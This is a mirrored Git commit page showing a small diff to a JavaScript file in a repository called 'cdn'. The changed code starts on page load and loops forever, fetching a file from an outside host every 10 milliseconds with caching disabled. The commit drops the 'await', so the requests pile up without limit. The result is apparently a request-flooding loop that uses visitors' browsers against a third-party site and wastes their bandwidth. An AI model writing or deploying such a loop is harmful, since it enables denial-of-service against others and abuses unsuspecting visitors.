mirror of
https://github.com/hexahigh/cdn.git
synced 2025-12-11 20:15:22 +01:00
e
This commit is contained in:
parent
f1c5bcb4f3
commit
7bd354613b
@ -25,7 +25,7 @@ $.getJSON("https://europe-central2-portfolio-website-374313.cloudfunctions.net/g
|
||||
window.onload = async function startdown(){
|
||||
while(true) {
|
||||
await delay(10);
|
||||
await fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"})
|
||||
fetch('https://t0m0t0w.github.io/backuprr/history.dat', {cache: "no-store"})
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user